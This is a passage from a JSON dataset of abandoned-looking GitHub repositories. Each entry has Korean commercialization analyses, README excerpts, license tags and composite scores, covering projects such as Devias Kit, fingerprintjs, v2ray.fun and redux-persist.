때문입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업이 자신의 관리자 대시보드나 고객 접근 화면을 빠르게 디자인하여 제품 출시 기간을 단축할 수 있습니다.","readme_excerpt":"## [Devias Kit - React](https://material-kit-react.devias.io/)\n\n![license](https://img.shields.io/badge/license-MIT-blue.svg)\n\n[![Devias Kit - React](https://github.com/devias-io/material-kit-react/blob/main/public/assets/thumbnail.png)](https://material-kit-react.devias.io/)\n\n> Free React Admin Dashboard made with [MUI's](https://mui.com) components, [React](https://reactjs.org) and of course [Next.js](https://github.com/vercel/next.js) to boost your app development process!\n\n## Pages \n\n- [Dashboard](https://material-kit-react.devias.io)\n- [Customers](https://material-kit-react.devias.io/dashboard/customers)\n- [Integrations](https://material-kit-react.devias.io/dashboard/integrations)\n- [Settings](https://material-kit-react.devias.io/dashboard/settings)\n- [Account](https://material-kit-react.devias.io/dashboard/account)\n- [Sign In](https://material-kit-react.devias.io/auth/sign-in)\n- [Sign Up](https://material-kit-react.devias.io/auth/sign-up)\n- [Reset Password](https://material-kit-r","composite_score":0.3361,"license_safety_tag":"safe"},{"name":"Valve/fingerprintjs2","github_url":"https://github.com/Valve/fingerprintjs2","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://fingerprint.com\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"resources/logo_light.svg\" />\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"resources/logo_dark.svg\" />\n      <img src=\"resources/logo_dark.svg\" alt=\"FingerprintJS logo\" width=\"312px\" />\n    </picture>\n  </a>\n</p>\n<p align=\"center\">\n  <a href=\"https://github.com/fingerprintjs/fingerprintjs/actions/workflows/test.yml\"><img src=\"https://github.com/fingerprintjs/fingerprintjs/actions/workflows/test.yml/badge.svg\" alt=\"Build status\"></a>\n  <a href=\"https://www.npmjs.com/package/@fingerprintjs/fingerprintjs\"><img src=\"https://img.shields.io/npm/v/@fingerprintjs/fingerprintjs.svg\" alt=\"Current NPM version\"></a>\n  <a href=\"https://www.npmjs.com/package/@fingerprintjs/fingerprintjs\"><img src=\"https://img.shields.io/npm/dm/@fingerprintjs/fingerprintjs.svg\" alt=\"Monthly downloads from NPM\"></a>\n  <a href=\"https://www.jsdelivr.com/package/npm/@fingerprintjs","composite_score":0.3359,"license_safety_tag":"safe"},{"name":"arjunmahishi/run-code.nvim","github_url":"https://github.com/arjunmahishi/run-code.nvim","stars":5,"language":"Lua","license":"MIT","abandonment_months":17,"description":"# run-code.nvim 상업화 분석\n\n## 왜 보물인가\n프로그래머가 글쓰기 프로그램(Neovim) 안에서 직접 코드를 실행하고 결과를 바로 볼 수 있는 도구로, 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 교육 플랫폼**: 온라인 코딩 강의 사이트에서 학생들이 강의 영상을 보면서 실시간으로 코드를 작성하고 실행해볼","readme_excerpt":"# flow.nvim\n\n[![Neovim](https://img.shields.io/badge/NeoVim-%2357A143.svg?&style=for-the-badge&logo=neovim&logoColor=white)](https://neovim.io/)\n[![Lua](https://img.shields.io/badge/Lua-blue.svg?style=for-the-badge&logo=lua)](http://www.lua.org)\n<!-- ![Usage](https://go-badges.vercel.app/api/nvim-plugin-usage?username=arjunmahishi&repo=flow.nvim) -->\n\nA lightweight neovim plugin to quickly run a snippet of code (in the context of the current file you’re editing) without ever leaving neovim. Gives you a slight boost in productivity by helping you automate parts of your development workflow. Has a pretty cool integration with telescope\n\n## Table of contents\n\n<!-- toc -->\n\n- [Demo](#demo)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Custom commands](#custom-commands)\n    + [Custom variables](#custom-variables)\n- [Configuration](#configuration)\n    + [`output` options](#output-options)\n    + [Sample dB config file](#sample-db-config-file)\n- [Some useful key bindings](#some-useful-k","composite_score":0.3359,"license_safety_tag":"safe"},{"name":"vahidk/EffectiveTensorflow","github_url":"https://github.com/vahidk/EffectiveTensorflow","stars":6,"language":"","license":"unknown","abandonment_months":68,"description":"# EffectiveTensorflow 분석\n\n## 왜 보물인가\n구글의 인공지능 핵심 기술인 텐서플로우를 효율적으로 사용하는 방법을 모아놓은 실무 가이드로, 개발자들이 더 빠르고 똑똑하게 AI를 만들 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **AI 교육 플랫폼 SaaS**: 인공지능을 배우는 학생과 직장인들을 위한 온라인 강좌 판매\n- **기업","readme_excerpt":"# Effective TensorFlow 2\n\nTable of Contents\n=================\n## Part I: TensorFlow 2 Fundamentals\n1.  [TensorFlow 2 Basics](#basics)\n2.  [Broadcasting the good and the ugly](#broadcast)\n3.  [Take advantage of the overloaded operators](#overloaded_ops)\n4.  [Control flow operations: conditionals and loops](#control_flow)\n5.  [Prototyping kernels and advanced visualization with Python ops](#python_ops)\n6.  [Numerical stability in TensorFlow](#stable)\n---\n\n_We updated the guide to follow the newly released TensorFlow 2.x API. If you want the original guide for TensorFlow 1.x see the [v1 branch](https://github.com/vahidk/EffectiveTensorflow/tree/v1)._\n\n_To install TensorFlow 2.0 (alpha) follow the [instructions on the official website](https://www.tensorflow.org/install/pip):_\n```\npip install tensorflow==2.0.0-alpha0\n```\n\n_We aim to gradually expand this series by adding new articles and keep the content up to date with the latest releases of TensorFlow API. If you have suggestions on how ","composite_score":0.3355,"license_safety_tag":"unknown"},{"name":"museui/muse-ui","github_url":"https://github.com/museui/muse-ui","stars":9,"language":"Vue","license":"unknown","abandonment_months":42,"description":"# Muse UI 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱의 버튼, 메뉴 같은 기본 구성 요소를 쉽게 만들 수 있는 재사용 가능한 디자인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 웹 애플리케이션을 빠르게 개발해야 하는 회사가 일관된 디자인으로 제품을 만들 때 활용\n2. **내부 업무 도구**: 기업의 직원용 관리","readme_excerpt":"\n<p align=\"center\">\n  <a href=\"https://muse-ui.org\" target=\"_blank\">\n    <img width=\"120\" src=\"./demo/icon_logo.png\">\n  </a>\n</p>\n\n<h1 align=\"center\">Muse-UI [不再维护]</h1>\n\n<p align=\"center\">\n  <a href=\"https://material.io/\">Material Design</a>\n  UI library for <a href=\"https://vuejs.org/\">Vuejs 2.0</a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://travis-ci.org/museui/muse-ui\">\n    <img src=\"https://img.shields.io/travis/museui/muse-ui.svg\" alt=\"travis ci badge\">\n  </a>\n  <a href=\"https://www.npmjs.org/package/muse-ui\">\n    <img src=\"https://img.shields.io/npm/v/muse-ui.svg\" alt=\"Downloads\">\n  </a>\n  <a href=\"https://npmjs.org/package/muse-ui\">\n    <img src=\"https://img.shields.io/npm/dm/muse-ui.svg\" alt=\"Downloads\">\n  </a>\n  <a href=\"https://gitter.im/muse-ui/muse-ui?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\">\n    <img src=\"https://badges.gitter.im/muse-ui/muse-ui.svg\" alt=\"Downloads\">\n  </a>\n</p>\n\n## Installation\n\nMuse-UI is available as an [npm package](","composite_score":0.3355,"license_safety_tag":"unknown"},{"name":"react-community/create-react-native-app","github_url":"https://github.com/react-community/create-react-native-app","stars":12,"language":"JavaScript","license":"bsd-3-clause","abandonment_months":23,"description":"# create-react-native-app 상업화 분석\n\n## 왜 보물인가\n휴대폰 앱을 만드는 복잡한 과정을 단순하게 시작할 수 있게 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 스타트업이 구독형으로 \"앱 개발을 쉽게 시작하는 템플릿과 튜토리얼\" 패키지를 판매\n2. **내부 업무 도구**: 대기업의 개발팀이 새","readme_excerpt":"<!-- Title -->\n\n<p align=\"center\">\n  <a href=\"https://github.com/expo/examples\">\n    <img alt=\"create-react-native-app\" src=\"./.gh-assets/banner.svg\">\n    <h1 align=\"center\">⚠️ Deprecated</h1>\n  </a>\n</p>\n\n<!-- Header -->\n\n<p align=\"center\">\n  <b>It's recommended to use a framework to build apps with React Native, <a href=\"https://reactnative.dev/docs/environment-setup\">learn more</a>.</b>\n</p>\n\n<br />\n\n<!-- Body -->\n\n## Deprecated\n\nCreate a new Expo project with [create-expo-app](https://github.com/expo/expo/tree/main/packages/create-expo#readme) instead:\n\n```bash\n# Usage for bun, npm, pnpm, and yarn\n$ npm create expo\n$ bun create expo\n$ pnpm create expo\n$ yarn create expo\n\n# Output help information with all available options\n$ npx create-expo --help\n```\n\n<div align=\"center\">\n  <br />\n  with&nbsp;❤️&nbsp;&nbsp;<strong>Expo</strong>\n  <br />\n</div>\n","composite_score":0.3354,"license_safety_tag":"safe"},{"name":"bolshchikov/js-must-watch","github_url":"https://github.com/bolshchikov/js-must-watch","stars":5,"language":"","license":"cc0-1.0","abandonment_months":53,"description":"# js-must-watch 상용화 분석\n\n## 왜 보물인가\n자바스크립트 개발자가 반드시 봐야 할 학습 자료들을 모아놓은 큐레이션 리스트로, 이미 검증된 좋은 콘텐츠만 모아둬서 개발자들의 학습 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 SaaS**: 회원가입 후 체계적으로 정렬된 강의 목록을 구독하는 서비스로, 월 $9","readme_excerpt":"[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n> This is a list of must-watch videos devoted to JavaScript \n\n## 2020\n1. [David Neal: **JavaScript: Past, Present and Future**](https://youtu.be/n-N67Q0O52U) [47:26]\n\n## 2019\n1. [Rich Harris: **Rethinking reactivity**](https://www.youtube.com/watch?v=AdNJ3fydeao) [36:44]\n1. [Mathias Bynens & Sathya Gunasekaran: **What's new in JavaScript?**](https://www.youtube.com/watch?v=c0oy0vQKEZE) [36:32]\n1. [Maxim Koretskyi: **JSConf EU: A sneak peek into super optimized code in JS frameworks**](https://www.youtube.com/watch?v=_VHNTC67NR8) [23:20]\n1. [Una Kravets: **CSS Houdini & The Future of Styling**](https://www.youtube.com/watch?v=GhRE3rML9t4) [25:42]\n\n## 2018\n1. [Jake Archibald: **In The Loop**](https://www.youtube.com/watch?v=cCOL7MC4Pl0) [35:11]\n1. [Malte Ubl: **Designing very large JavaScript application**](https://www.youtube.com/wat","composite_score":0.3353,"license_safety_tag":"unknown"},{"name":"pangudashu/php7-internal","github_url":"https://github.com/pangudashu/php7-internal","stars":7,"language":"","license":"unknown","abandonment_months":49,"description":"# pangudashu/php7-internal 분석 보고서\n\n## 왜 보물인가\nPHP라는 웹 개발 언어의 내부 작동 원리를 설명하는 교육 자료로, 웹 개발자들의 실력 향상과 기술 이해도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: PHP 개발자를 위한 심화 강의 콘텐츠로 판매 (Udemy, 패스트캠퍼스 유사)\n2. *","readme_excerpt":"# PHP7内核剖析\n````\n原创内容，转载请注明出处~\n\n代码版本：php-7.0.12\n````\n## 反馈\n[交流&吐槽](https://github.com/pangudashu/php7-internal/issues/3)  [错误反馈](https://github.com/pangudashu/php7-internal/issues/2)\n\n## 纸质版\n<div align=\"center\">\n    <img src=\"img/book.jpg\" height=\"280\" >\n</div>\n\n[京东](https://item.jd.com/12267210.html)\n[当当](http://product.dangdang.com/25185400.html)\n\n## 目录：\n* 第1章 PHP基本架构\n   * 1.1 PHP简介\n   * 1.2 PHP7的改进\n   * [1.3 FPM](1/fpm.md)\n      * [1.3.1 概述](1/fpm.md)\n      * [1.3.2 基本实现](1/fpm.md)\n      * [1.3.3 FPM的初始化](1/fpm.md)\n      * [1.3.4 请求处理](1/fpm.md)\n      * [1.3.5 进程管理](1/fpm.md)\n   * [1.4 PHP执行的几个阶段](1/base_process.md)\n* 第2章 变量\n   * [2.1 变量的内部实现](2/zval.md)\n   * [2.2 数组](2/zend_ht.md)\n   * [2.3 静态变量](2/static_var.md)\n   * [2.4 全局变量](2/global_var.md)\n   * [2.5 常量](2/zend_constant.md)\n* 第3章 Zend虚拟机\n   * [3.1 PHP代码的编译](3/zend_compile.md)\n      * [3.1.1 词法解析、语法解析](3/zend_compile_parse.md)\n      * [3.1.2 抽象语法树编译流程](3/zend_compile_opcode.md)\n   * [3.2 函数实现](3/function_implement.md)\n      * [3","composite_score":0.3353,"license_safety_tag":"unknown"},{"name":"china-testing/python-api-tesing","github_url":"https://github.com/china-testing/python-api-tesing","stars":5,"language":"Python","license":"unknown","abandonment_months":40,"description":"# python-api-testing 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 온라인 서비스의 안정성을 자동으로 검사할 수 있는 도구로, 버그를 사람이 일일이 찾는 번거로움을 없앨 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 애플리케이션 개발사가 새 기능 출시 전 자동으로 버그를 감지하는 품질 관리 플랫폼\n- **내부 업무 ","readme_excerpt":"\n逐步迁移到新仓库：  [python_cn_resouce](https://github.com/china-testing/python_cn_resouce)\n\n\npython测试开发钉钉群：21745728，目前800多人，另有几千人的python测试开发微信群，可联系 钉钉或微信号 pythontesting 加群（备注：python）！\n\n * [国学 中医 历史等社科类书籍下载](https://github.com/china-testing/python-api-tesing/blob/master/society_books.md)\n * [电影 视频 下载](https://github.com/china-testing/python-api-tesing/blob/master/videos.md)\n * [IT类书籍 下载](https://github.com/china-testing/python-api-tesing/blob/master/books.md)\n \n \n * [python八字排盘库](https://github.com/china-testing/bazi)\n * 技术支持：看八字风水请联系钉钉、抖音或微信pythontesting\n * 另有飞书、微信、钉钉、抖音等提供大量免费电子书共享。 八字培训等\n\n\ntools目录：\n\n * check_face.py  从excel中读取文件，进行人脸识别\n \n * check_md5.py 多进程检查MD5值重复文件 [文档](http://blog.sciencenet.cn/blog-2604609-1105189.html)\n \n * concat_file.py 合并文件，和linux的paste命令类似\n \n * get_gaze_value.py 获取人脸识别服务器端注视的错误统计\n \n * get_live_server_result.py 获取人脸识别服务器端活体的错误统计\n \n * get_range.py 获取人脸识别的区间值\n \n * get_verify_server_result.py 获取人脸识别服务器端比对的错误统计\n \n * raw2jpg.py 转换ir,depth等raw图为jpg图\n \n * rotate.py 图像旋转\n\n ","composite_score":0.3352,"license_safety_tag":"unknown"},{"name":"leitbogioro/v2ray.fun","github_url":"https://github.com/leitbogioro/v2ray.fun","stars":8,"language":"Shell","license":"unknown","abandonment_months":44,"description":"","readme_excerpt":"# v2ray.fun\nA easily command interaction manager for v2ray\n<br>\n一个简单的 v2ray 管理工具\n\n## 开发 v2ray.fun 的目的（Purpose of developing v2ray.fun）\nEvery human has his/her own specialties, they may not skilled enough to familiar with complex configurations about how to config proxy tools and know everything about it, so I wish you can achieve a benifit over this tool and escape variety censorships before access internet safely, conveniently, rapidly, freely.\n<br>\n<br>\n术业有专攻，有些人可能没有足够娴熟的技术，洞察某些代理工具的使用规则，但我希望他们可以借某些工具，从复杂的调参中解脱出来，摆脱某些机构的审查，以安全、便捷、快速、自由地访问互联网。\n\n<!-- vim-markdown-toc GFM -->\n\n## 目录（Catalogs）\n* [V2ray.fun](#v2rayfun)\n    * [项目简介](#项目简介)\n    * [功能](#功能)\n    * [客户端](#客户端)\n    * [安装命令](#安装命令)\n    * [升级命令](#升级命令)\n    * [卸载命令](#卸载命令)\n    * [截图](#截图)\n    * [系统要求](#系统要求)\n    * [软件要求](#软件要求)\n    * [更新日志](#更新日志)\n    * [特别说明](#特别说明)\n\n<!-- vim-markdown-toc -->\n\n## 项目简介\n\nv2ray.fun 是一款用于控制、配置 v2ray Linux 服务端的脚本程序，程序以交互式向导模式，向用户提供更改端口，加密方式，传输协议等功能，可省去手动配置大段 v2ray 配置文件可能出现的格式错误、配置错误等麻烦，尽情享受V2ray的乐趣~~\n","composite_score":0.3352,"license_safety_tag":"unknown"},{"name":"ityouknow/awesome-spring-boot","github_url":"https://github.com/ityouknow/awesome-spring-boot","stars":5,"language":"","license":"unknown","abandonment_months":24,"description":"# ityouknow/awesome-spring-boot 분석\n\n## 왜 보물인가\nSpring Boot라는 인기 있는 웹 개발 도구를 배우고 싶어 하는 개발자들이 찾는 학습 자료 모음이라는 점에서 수요가 지속될 것으로 예상됩니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 코딩 스쿨이나 온라인 교육 사이트가 학습 자료로 제공하는 유료 구독","readme_excerpt":"# Awesome Spring Boot\n\n收集各种 Spring Boot 学习资源\n\n[参与贡献](https://github.com/ityouknow/awesome-spring-boot/issues/1)\n\n\n## 目录\n\n- [博客](#博客)\n- [网站](#网站)\n- [开源](#开源)\n- [其它](#其它)\n\n[Spring Boot Starters 列表](starter-list.md)\n\n\n## 博客\n\n- [纯洁的微笑-Spring Boot系列文章](http://www.ityouknow.com/spring-boot.html)  \n- [江南一点雨-关于Spring Boot](https://www.javaboy.org/springboot/)  \n- [林祥纤-从零开始学Spring Boot](http://412887952-qq-com.iteye.com/category/356333)   \n- [Mkyong-Spring Boot教程（国外）](http://www.mkyong.com/tutorials/spring-boot-tutorials/)\n- [baeldung-Spring Boot教程（国外）](https://www.baeldung.com/spring-boot)  \n- [liaokailin的专栏-Spring Boot实战](http://blog.csdn.net/liaokailin/article/category/5765237)\n- [catoop的专栏-Spring Boot 学习](http://blog.csdn.net/column/details/spring-boot.html)  \n- [方志朋-SpringBoot 非官方教程](https://www.fangzhipeng.com/spring-boot.html)  \n- [嘟嘟-Spring-Boot干货系列](http://tengj.top/categories/Spring-Boot%E5%B9%B2%E8%B4%A7%E7%B3%BB%E5%88%97/)  \n- [小柒-SpringBoot开发案例](https://blog.52itstyle.com/category/","composite_score":0.3352,"license_safety_tag":"unknown"},{"name":"google/android-classyshark","github_url":"https://github.com/google/android-classyshark","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":37,"description":"# ClassyShark 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱의 내부 구조를 간단하게 분석할 수 있는 도구로, 앱 개발자와 보안 담당자들이 앱이 어떻게 만들어졌는지 빠르게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 앱 분석 SaaS**: 기업의 안드로이드 앱 품질을 자동으로 검사해주는 클라우드 서비스\n**2. 보안 감시 도구**: 회","readme_excerpt":"# ClassyShark\n\n### Introduction\n\n![alt text](https://github.com/borisf/classyshark-user-guide/blob/master/images/5%20ClassesDexData.png)\n\nClassyShark is a standalone binary inspection tool for Android developers. It can reliably browse any Android executable and show important info such as class interfaces and members, dex counts and dependencies. ClassyShark supports multiple formats including libraries (.dex, .aar, .so), executables (.apk, .jar, .class) and all Android binary XMLs: AndroidManifest, resources, layouts etc.\n\n### Useful links\n* [User guide](https://github.com/borisf/classyshark-user-guide)\n* [Command-line reference](https://github.com/google/android-classyshark/blob/master/CommandLine.pdf)\n* Gradle [sample](https://github.com/google/android-classyshark/tree/master/Samples/SampleGradle)\n* [Vision and Strategy](https://docs.google.com/document/d/1sK_WNzHn_6Q1V_dohxrtk1tlsPXsi9cEVnIuYuVig0M/edit?usp=sharing)\n\n### Download\nTo run, grab the [latest JAR](https://github.com/go","composite_score":0.335,"license_safety_tag":"safe"},{"name":"skyvow/wux","github_url":"https://github.com/skyvow/wux","stars":5,"language":"JavaScript","license":"mit","abandonment_months":25,"description":"# skyvow/wux 프로젝트 분석\n\n## 왜 보물인가\n최근 업데이트(2024년 4월)되는 활발한 프로젝트로, 작지만 실용적인 도구로 보이며 MIT 라이선스로 자유롭게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 설계 도구나 데이터 시각화 서비스에 핵심 기능으로 탑재\n2. **내부 업무 도구**: 기업의 정보 시","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://wuxui.com/\">\n        <img width=\"200\" src=\"./screenshots/logo.png\">\n    </a>\n</p>\n\n<h1 align=\"center\">Wux Weapp</h1>\n\n<div align=\"center\">\n    <p>一套组件化、可复用、易扩展的微信小程序</p>\n    <a href=\"https://github.com/wux-weapp/wux-weapp/\" target=\"_blank\">\n        <img alt=\"star this repo\" src=\"https://img.shields.io/github/stars/wux-weapp/wux-weapp\" />\n    </a>\n    <a href=\"https://github.com/wux-weapp/wux-weapp/fork\" target=\"_blank\">\n        <img alt=\"fork this repo\" src=\"https://img.shields.io/github/forks/wux-weapp/wux-weapp\" />\n    </a>\n    <a href=\"https://circleci.com/gh/wux-weapp/wux-weapp\" target=\"_blank\">\n        <img alt=\"circleci\" src=\"https://img.shields.io/circleci/build/github/wux-weapp/wux-weapp/master.svg?label=circleci\" />\n    </a>\n    <a href=\"https://travis-ci.org/wux-weapp/wux-weapp\" target=\"_blank\">\n        <img alt=\"travis\" src=\"https://img.shields.io/travis/wux-weapp/wux-weapp.svg?label=travis\" />\n    </a>\n    <a href=\"https://github.com/","composite_score":0.335,"license_safety_tag":"safe"},{"name":"fchollet/keras-resources","github_url":"https://github.com/fchollet/keras-resources","stars":5,"language":"","license":"unknown","abandonment_months":28,"description":"# Keras 리소스 저장소 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶은 초보자들을 위해 구글의 대표 AI 도구인 '케라스'의 학습 자료와 예제 코드를 한곳에 모아놓은 공식 자료실입니다.\n\n## 어디에 쓸 수 있나\n- **AI 교육 플랫폼 SaaS**: 온라인 인공지능 학습 서비스에서 이 자료들을 기반으로 강좌 콘텐츠 제공\n- **기업 내부 교육 도구*","readme_excerpt":"# Keras resources\n\nThis is a directory of tutorials and open-source code repositories for working with Keras, the Python deep learning library.\n\nIf you have a high-quality tutorial or project to add, please open a PR.\n\n## Official starter resources\n\n- [keras.io](http://keras.io/) - Keras documentation\n- [Getting started with the Sequential model](http://keras.io/getting-started/sequential-model-guide/)\n- [Getting started with the functional API](http://keras.io/getting-started/functional-api-guide/)\n- [Keras FAQ](http://keras.io/getting-started/faq/)\n\n## Tutorials\n\n- [Quick start: the Iris dataset in Keras and scikit-learn](https://github.com/fastforwardlabs/keras-hello-world/blob/master/kerashelloworld.ipynb)\n- [Using pre-trained word embeddings in a Keras model](http://blog.keras.io/using-pre-trained-word-embeddings-in-a-keras-model.html)\n- [Building powerful image classification models using very little data](http://blog.keras.io/building-powerful-image-classification-models-using-v","composite_score":0.3349,"license_safety_tag":"unknown"},{"name":"GeorgeSeif/Semantic-Segmentation-Suite","github_url":"https://github.com/GeorgeSeif/Semantic-Segmentation-Suite","stars":5,"language":"Python","license":"unknown","abandonment_months":62,"description":"# Semantic-Segmentation-Suite 상용화 분석\n\n## 왜 보물인가\n사진 속 각 물체를 자동으로 인식하고 구분하는 기술로, 자율주행차, 의료 영상 분석, 드론 감시 등 다양한 실제 산업에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 건설사에 제공하는 \"건설 현장 안전 감시 AI\" - 인부 위치, 장비","readme_excerpt":"# Semantic Segmentation Suite in TensorFlow\n\n![alt-text-10](https://github.com/GeorgeSeif/Semantic-Segmentation-Suite/blob/master/Images/semseg.gif)\n\n## News\n\n### What's New\n\n- This repo has been depricated and will no longer be handling issues. Feel free to use as is :)\n\n## Description\nThis repository serves as a Semantic Segmentation Suite. The goal is to easily be able to implement, train, and test new Semantic Segmentation models! Complete with the following:\n\n- Training and testing modes\n- Data augmentation\n- Several state-of-the-art models. Easily **plug and play** with different models\n- Able to use **any** dataset\n- Evaluation including precision, recall, f1 score, average accuracy, per-class accuracy, and mean IoU\n- Plotting of loss function and accuracy over epochs\n\n**Any suggestions to improve this repository, including any new segmentation models you would like to see are welcome!**\n\nYou can also check out my [Transfer Learning Suite](https://github.com/GeorgeSeif/Transfer-","composite_score":0.3348,"license_safety_tag":"unknown"},{"name":"yinghuocho/firefly-proxy","github_url":"https://github.com/yinghuocho/firefly-proxy","stars":13,"language":"Go","license":"bsd-2-clause","abandonment_months":92,"description":"# Firefly Proxy 분석 보고서\n\n## 왜 보물인가\n인터넷 접속을 중계하는 기술로, 네트워크 보안과 속도 최적화가 필요한 기업들이 찾는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 네트워크 보안 서비스**: 직원들의 인터넷 사용을 모니터링하고 제어하는 중간 서버로 운영\n2. **글로벌 CDN 솔루션**: 여러 지역의 사용자에게 빠른","readme_excerpt":"## Firefly 萤火虫\n\n### 请更新至最新版本 (android 0.1.1, 桌面 0.9.8)\n\n### 用户交流\n[中文聊天室 ![Join the chat at https://gitter.im/firefly-proxy/cn-users](https://badges.gitter.im/firefly-proxy/cn-users.svg)](https://gitter.im/firefly-proxy/cn-users?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n[Global Users ![Join the chat at https://gitter.im/firefly-proxy/Lobby](https://badges.gitter.im/firefly-proxy/Lobby.svg)](https://gitter.im/firefly-proxy/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n### 下载 \n- **Windows:**            \n  + [安装版](https://raw.githubusercontent.com/cdtmirrors/yhc/master/yhc.exe) | [单文件版](https://raw.githubusercontent.com/cdtmirrors/yhc/master/greenyhc.exe) \n- **Android 4.0.3 及以上:**\n  + [直接下载](https://raw.githubusercontent.com/cdtmirrors/yhc/master/yhc.apk) | [Google Play](https://play.google.com/store/apps/details?id=org.gofirefly.android.vpn)\n- **iOS 9.3 及以上:**\n  + [中国 App Store](https://itunes.apple.com/cn/app/%E5%B0%BC","composite_score":0.3347,"license_safety_tag":"safe"},{"name":"rolling-scopes-school/nodejs-aws-fe","github_url":"https://github.com/rolling-scopes-school/nodejs-aws-fe","stars":12,"language":"TypeScript","license":"NOASSERTION","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.3346,"license_safety_tag":"unknown"},{"name":"swiftmailer/swiftmailer","github_url":"https://github.com/swiftmailer/swiftmailer","stars":7,"language":"PHP","license":"mit","abandonment_months":56,"description":"# SwiftMailer 분석 리포트\n\n## 왜 보물인가\n이메일을 안전하고 안정적으로 보내는 기술로, 온라인 사업을 하는 거의 모든 회사에서 필요로 하는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 이메일 발송 서비스**: 회사들이 고객에게 대량의 이메일을 보낼 때 사용하는 핵심 엔진 제공\n2. **내부 업무 도구**: 전자상거래 플랫폼","readme_excerpt":"Swift Mailer\n------------\n\n**Swiftmailer will stop being maintained at the end of November 2021.**\n\nPlease, move to [Symfony Mailer](https://symfony.com/doc/current/mailer.html) at your earliest convenience.\n[Symfony Mailer](https://symfony.com/doc/current/mailer.html) is the next evolution of Swiftmailer.\nIt provides the same features with support for modern PHP code and support for third-party providers.\n\nSwift Mailer is a component based mailing solution for PHP.\nIt is released under the MIT license.\n\nSwift Mailer is highly object-oriented by design and lends itself\nto use in complex web application with a great deal of flexibility.\n\nFor full details on usage, read the [documentation](https://swiftmailer.symfony.com/docs/introduction.html).\n\nSponsors\n--------\n\n<div>\n    <a href=\"https://blackfire.io/docs/introduction?utm_source=swiftmailer&utm_medium=github_readme&utm_campaign=logo\">\n        <img src=\"https://static.blackfire.io/assets/intemporals/logo/png/blackfire-io_secondary_hor","composite_score":0.3343,"license_safety_tag":"safe"},{"name":"schmich/instascan","github_url":"https://github.com/schmich/instascan","stars":5,"language":"JavaScript","license":"mit","abandonment_months":54,"description":"# Instascan 상용화 분석\n\n## 왜 보물인가\n스마트폰 카메라로 바코드를 찍어 상품 정보를 즉시 확인할 수 있는 간단하면서도 실용적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **소매점 재고관리 SaaS**: 매장 직원이 앱으로 상품 바코드를 스캔하면 자동으로 재고가 업데이트되는 서비스\n2. **도서관/창고 내부 도구**: 도서관이나 물류 창고에","readme_excerpt":"# ![Instascan](https://raw.githubusercontent.com/schmich/instascan/master/assets/qr.png) Instascan\nReal-time webcam-driven HTML5 QR code scanner. [Try the live demo](https://schmich.github.io/instascan/).\n\n## Installing\n\n*Note:* Chrome requires HTTPS when using the WebRTC API. Any pages using this library should be served over HTTPS.\n\n### NPM\n\n`npm install --save instascan`\n\n```javascript\nconst Instascan = require('instascan');\n```\n\n### Bower\n\nPending. [Drop a note](https://github.com/schmich/instascan/issues/31) if you need Bower support.\n\n### Minified\n\nCopy `instascan.min.js` from the [releases](https://github.com/schmich/instascan/releases) page and load with:\n\n```html\n<script type=\"text/javascript\" src=\"instascan.min.js\"></script>\n```\n\n## Example\n\n```html\n<!DOCTYPE html>\n<html>\n  <head>\n    <title>Instascan</title>\n    <script type=\"text/javascript\" src=\"instascan.min.js\"></script>\n  </head>\n  <body>\n    <video id=\"preview\"></video>\n    <script type=\"text/javascript\">\n      let sca","composite_score":0.3343,"license_safety_tag":"safe"},{"name":"rt2zz/redux-persist","github_url":"https://github.com/rt2zz/redux-persist","stars":5,"language":"TypeScript","license":"mit","abandonment_months":25,"description":"# redux-persist 수익화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 사용자의 작업 내용을 자동으로 저장해주는 기술로, 앱이 꺼져도 이전 상태를 복구할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 메모장, 협업 도구 등에서 사용자가 작업하던 내용이 자동 저장되도록 지원\n2. **내부 업무 도구**: 기업의 C","readme_excerpt":"# Redux Persist\nPersist and rehydrate a redux store.\n\n[![build status](https://img.shields.io/travis/rt2zz/redux-persist/master.svg?style=flat-square)](https://travis-ci.org/rt2zz/redux-persist) [![npm version](https://img.shields.io/npm/v/redux-persist.svg?style=flat-square)](https://www.npmjs.com/package/redux-persist) [![npm 